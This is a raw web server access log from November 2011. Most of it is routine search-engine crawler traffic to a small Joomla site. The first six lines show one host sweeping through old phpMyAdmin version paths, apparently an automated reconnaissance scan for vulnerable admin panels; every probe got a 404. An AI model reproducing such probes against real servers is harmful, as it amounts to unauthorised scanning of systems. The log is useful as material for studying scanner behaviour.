173.192.48.66 - - [18/Nov/2011:10:53:50 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 481 "-" "-"
173.192.48.66 - - [18/Nov/2011:10:53:51 +0100] "GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1" 404 481 "-" "-"
173.192.48.66 - - [18/Nov/2011:10:53:51 +0100] "GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1" 404 481 "-" "-"
173.192.48.66 - - [18/Nov/2011:10:53:51 +0100] "GET //phpMyAdmin-2.5.6/index.php HTTP/1.1" 404 478 "-" "-"
173.192.48.66 - - [18/Nov/2011:10:53:51 +0100] "GET //phpMyAdmin-2.5.7/index.php HTTP/1.1" 404 478 "-" "-"
173.192.48.66 - - [18/Nov/2011:10:54:02 +0100] "GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1" 404 481 "-" "-"
66.249.72.225 - - [18/Nov/2011:12:26:55 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.225 - - [18/Nov/2011:12:26:55 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=13&Itemid=29 HTTP/1.1" 200 2685 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.18 - - [18/Nov/2011:13:36:05 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.85 - - [18/Nov/2011:13:36:24 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.225 - - [18/Nov/2011:13:58:03 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=56:jeugdkamp-2011&catid=19:mededelingen-jeugdcommissie&Itemid=56 HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.84.207.147 - - [18/Nov/2011:22:13:59 +0100] "GET / HTTP/1.1" 206 372 "-" "Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30) Lightspeedsystems"
207.46.204.177 - - [18/Nov/2011:22:27:28 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.177 - - [18/Nov/2011:22:28:09 +0100] "GET / HTTP/1.1" 304 211 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
193.252.118.176 - - [19/Nov/2011:00:35:09 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
123.125.71.84 - - [19/Nov/2011:08:38:18 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.225 - - [19/Nov/2011:12:03:38 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.225 - - [19/Nov/2011:12:03:38 +0100] "GET / HTTP/1.1" 304 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.194.37 - - [19/Nov/2011:16:20:13 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=Messenger; (Messenger); .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)"
95.108.151.244 - - [19/Nov/2011:22:25:16 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Nov/2011:22:25:17 +0100] "GET / HTTP/1.1" 200 372 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Nov/2011:22:25:18 +0100] "GET / HTTP/1.1" 200 372 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.110 - - [20/Nov/2011:04:04:25 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.94.249.37 - - [20/Nov/2011:05:48:32 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.246.165.190 - - [20/Nov/2011:08:19:40 +0100] "GET /robots.txt HTTP/1.0" 404 491 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.190 - - [20/Nov/2011:08:19:40 +0100] "GET / HTTP/1.1" 200 335 "http://whois.domaintools.com/deinon.net" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
66.249.72.225 - - [20/Nov/2011:09:11:50 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.225 - - [20/Nov/2011:09:11:50 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&layout=blog&id=18&Itemid=55 HTTP/1.1" 200 4359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.225 - - [20/Nov/2011:10:44:03 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=28&Itemid=52 HTTP/1.1" 200 2815 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.114 - - [20/Nov/2011:12:17:03 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.1.66 - - [21/Nov/2011:03:32:36 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [21/Nov/2011:03:42:20 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [21/Nov/2011:03:43:21 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [21/Nov/2011:04:00:57 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [21/Nov/2011:04:19:26 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.80.194.29 - - [21/Nov/2011:04:48:45 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.7; PeoplePal 3.0)"
66.249.72.225 - - [21/Nov/2011:08:46:12 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.225 - - [21/Nov/2011:08:46:12 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=11&Itemid=37 HTTP/1.1" 200 2662 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.75.77.11 - - [21/Nov/2011:11:43:48 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "SeznamBot/3.0 (+http://fulltext.sblog.cz/)"
77.75.77.11 - - [21/Nov/2011:11:43:49 +0100] "GET / HTTP/1.1" 304 210 "-" "SeznamBot/3.0 (+http://fulltext.sblog.cz/)"
193.252.118.176 - - [22/Nov/2011:00:19:44 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.176 - - [22/Nov/2011:00:19:56 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.115.10.193 - - [22/Nov/2011:03:09:35 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [22/Nov/2011:03:32:07 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [22/Nov/2011:03:34:52 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [22/Nov/2011:03:35:07 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [22/Nov/2011:03:47:56 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.144 - - [22/Nov/2011:07:29:55 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [22/Nov/2011:07:29:55 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=64 HTTP/1.1" 200 4236 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [22/Nov/2011:08:58:20 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=16 HTTP/1.1" 200 3379 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [22/Nov/2011:14:52:04 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=56 HTTP/1.1" 200 4010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.88.24.28 - - [22/Nov/2011:16:09:42 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.24.28 - - [22/Nov/2011:16:09:45 +0100] "GET / HTTP/1.1" 200 372 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.80.194.26 - - [22/Nov/2011:17:29:37 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; .NET CLR 2.0.50727)"
123.125.71.84 - - [22/Nov/2011:23:26:09 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
124.115.1.66 - - [23/Nov/2011:03:09:01 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [23/Nov/2011:03:11:08 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.144 - - [23/Nov/2011:03:33:12 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [23/Nov/2011:03:33:12 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=32 HTTP/1.1" 200 4519 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.10.193 - - [23/Nov/2011:03:35:02 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [23/Nov/2011:03:41:22 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.144 - - [23/Nov/2011:04:02:09 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.1.61 - - [23/Nov/2011:04:08:20 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.89 - - [23/Nov/2011:06:17:32 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.144 - - [23/Nov/2011:06:33:51 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&id=1&Itemid=34 HTTP/1.1" 200 2868 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [23/Nov/2011:15:32:26 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [23/Nov/2011:15:32:26 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=12&Itemid=63 HTTP/1.1" 200 3559 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.80.93.71 - - [23/Nov/2011:22:53:04 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
207.46.204.177 - - [23/Nov/2011:22:59:25 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.177 - - [23/Nov/2011:23:00:15 +0100] "GET / HTTP/1.1" 304 211 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
124.115.1.61 - - [24/Nov/2011:04:02:23 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [24/Nov/2011:04:22:53 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [24/Nov/2011:04:44:45 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [24/Nov/2011:05:37:43 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [24/Nov/2011:05:40:16 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.80.194.26 - - [24/Nov/2011:06:42:12 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sky Broadband; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 1.0; IEMB3)"
123.125.71.32 - - [24/Nov/2011:19:02:11 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
193.252.118.176 - - [25/Nov/2011:00:58:42 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.72.144 - - [25/Nov/2011:01:35:00 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [25/Nov/2011:01:35:00 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=10&Itemid=32 HTTP/1.1" 200 2903 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.1.66 - - [25/Nov/2011:03:04:27 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [25/Nov/2011:03:32:26 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [25/Nov/2011:03:34:29 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [25/Nov/2011:04:04:55 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [25/Nov/2011:04:35:35 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.113 - - [25/Nov/2011:06:36:22 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.130.53.5 - - [25/Nov/2011:09:06:32 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
66.249.72.144 - - [25/Nov/2011:12:01:41 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3 HTTP/1.1" 200 4614 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.88 - - [25/Nov/2011:13:46:00 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.144 - - [25/Nov/2011:14:41:32 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [25/Nov/2011:14:41:32 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=20&Itemid=33 HTTP/1.1" 200 3694 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [25/Nov/2011:15:09:54 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=11&Itemid=37 HTTP/1.1" 200 2663 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [25/Nov/2011:15:17:38 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=24 HTTP/1.1" 200 4384 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.194.28 - - [25/Nov/2011:22:18:52 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; snprtz|S04774509400267; .NET CLR 1.1.4322)"
124.115.1.66 - - [26/Nov/2011:02:52:15 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [26/Nov/2011:03:11:41 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [26/Nov/2011:03:20:00 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [26/Nov/2011:03:20:22 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [26/Nov/2011:03:56:21 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
107.22.130.228 - - [26/Nov/2011:04:26:34 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
69.28.58.29 - - [26/Nov/2011:06:32:34 +0100] "GET /robots.txt HTTP/1.0" 404 491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) (larbin2.6.3@unspecified.mail)"
69.28.58.29 - - [26/Nov/2011:06:32:34 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) larbin2.6.3@unspecified.mail"
66.249.72.144 - - [26/Nov/2011:09:59:42 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [26/Nov/2011:09:59:42 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=8 HTTP/1.1" 200 4068 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.22 - - [26/Nov/2011:13:33:25 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.82 - - [26/Nov/2011:13:33:55 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.1.62 - - [27/Nov/2011:02:40:34 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [27/Nov/2011:02:46:43 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.80.93.71 - - [27/Nov/2011:03:30:46 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [27/Nov/2011:03:35:00 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [27/Nov/2011:03:38:56 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [27/Nov/2011:03:44:14 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.144 - - [27/Nov/2011:09:32:28 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [27/Nov/2011:09:32:28 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=32 HTTP/1.1" 200 4519 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.108.92 - - [27/Nov/2011:13:34:35 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.21 - - [27/Nov/2011:13:39:44 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
208.80.194.29 - - [27/Nov/2011:14:29:14 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SU 2.010; yplus 5.1.04b)"
207.46.199.39 - - [27/Nov/2011:16:56:53 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.199.39 - - [27/Nov/2011:16:57:53 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
123.125.71.35 - - [27/Nov/2011:17:45:46 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.96 - - [27/Nov/2011:17:46:23 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.17.171 - - [27/Nov/2011:21:40:52 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
173.193.216.83 - - [27/Nov/2011:22:07:08 +0100] "GET / HTTP/1.1" 200 335 "http://www.deinon.net" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
193.252.118.176 - - [28/Nov/2011:01:11:12 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.176 - - [28/Nov/2011:01:11:22 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
220.181.108.75 - - [28/Nov/2011:03:29:12 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
124.115.11.187 - - [28/Nov/2011:04:49:12 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [28/Nov/2011:04:52:39 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [28/Nov/2011:05:04:50 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [28/Nov/2011:05:07:39 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [28/Nov/2011:05:13:05 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
38.105.71.72 - - [28/Nov/2011:06:09:43 +0100] "GET / HTTP/1.1" 200 373 "http://www.google.com/search?hl=en&source=hp&q=title&aq=f&aqi=&aql=&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.207.136.128 - - [28/Nov/2011:06:49:05 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
66.249.72.144 - - [28/Nov/2011:08:05:11 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.144 - - [28/Nov/2011:08:05:11 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&id=19&layout=blog&Itemid=56 HTTP/1.1" 200 4195 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.33 - - [28/Nov/2011:09:36:52 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.97 - - [28/Nov/2011:09:37:35 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.207.136.128 - - [28/Nov/2011:13:14:32 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
207.46.195.240 - - [28/Nov/2011:13:50:23 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.214 - - [28/Nov/2011:14:54:03 +0100] "GET / HTTP/1.1" 200 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko)"
77.88.24.28 - - [28/Nov/2011:21:11:13 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.24.28 - - [28/Nov/2011:23:10:04 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
124.115.10.193 - - [29/Nov/2011:03:32:04 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [29/Nov/2011:03:33:23 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [29/Nov/2011:04:13:39 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
